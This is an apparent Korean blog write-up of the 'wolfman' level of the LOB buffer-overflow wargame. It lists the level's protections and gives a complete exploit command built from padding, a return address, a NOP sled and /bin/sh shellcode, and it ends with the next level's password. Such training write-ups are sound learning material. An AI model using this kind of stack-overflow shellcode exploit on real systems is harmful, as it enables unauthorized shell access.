hacking

[LOB] orc

hy3on9 2021. 8. 26. 19:21

wolfman.c

환경변수 막고

ret는 stack segment

buffer 막기 (새로 추가된 것)

 

저번 문제에서 buffer를 사용하지 않았으니 이전 공격 방법과 같게 해도 exploit이 가능하다

 

./wolfman `python -c 'print "A" * 44 + "\xfe\xfb\xff\xbf" + " " + "\x90" * 100 + "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x89\xc2\xb0\x0b\xcd\x80"'`

 

success

 

하고 끝내자니 너무 싱거우니깐

orc로 가서 이번 문제에서 막힌 부분을 활용하여 exploit 해보자 (ret를 buffer로 돌리고 buffer에 shellcode 넣기)

 

buffer의 주소를 알아냈다

0xbffffac0

성공!

 

 

wolfman / love eyuna